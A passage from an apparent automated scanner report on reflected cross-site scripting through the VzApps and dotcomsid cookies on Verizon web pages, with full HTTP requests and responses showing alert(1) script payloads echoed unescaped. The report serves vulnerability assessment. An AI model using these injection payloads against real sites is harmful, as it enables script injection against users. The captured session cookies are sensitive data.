Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX8b27c<script>alert(1)</script>9b933fecabb; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119132
Expires: Sat, 20 Nov 2010 02:58:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:58:31 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:58:30 GMT; path=/
Set-Cookie: ContextInfo_State=TX8b27c<script>alert(1)</script>9b933fecabb; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:58:30 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:58:30 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:58:30 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX8B27C<SCRIPT>ALERT(1)</SCRIPT>9B933FECABB </DIV>
...[SNIP]...

3.270. https://www22.verizon.com/Residential/FiOSInternet/Overview.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/Overview.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 429f7'><script>alert(1)</script>ffc246269ca was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX429f7'><script>alert(1)</script>ffc246269ca; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119136
Expires: Sat, 20 Nov 2010 02:57:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:53 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=TX429f7'><script>alert(1)</script>ffc246269ca; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX429F7'><SCRIPT>ALERT(1)</SCRIPT>FFC246269CA ' />
...[SNIP]...

3.271. https://www22.verizon.com/Residential/FiOSInternet/Overview.htm [dotcomsid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/Overview.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8315"-alert(1)-"72b07553601 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSInternet/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=a8315"-alert(1)-"72b07553601; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 125645
Expires: Sat, 20 Nov 2010 02:57:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:47 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:46 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:46 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:46 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:46 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "a8315"-alert(1)-"72b07553601"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: docu
...[SNIP]...

3.272. https://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/Plans/Plans.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload ee9d4<script>alert(1)</script>d473025d44e was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXee9d4<script>alert(1)</script>d473025d44e; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 150432
Expires: Sat, 20 Nov 2010 03:00:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:00:56 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXEE9D4<SCRIPT>ALERT(1)</SCRIPT>D473025D44E </DIV>
...[SNIP]...

3.273. https://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSInternet/Plans/Plans.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c19d5'><script>alert(1)</script>36277642c37 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
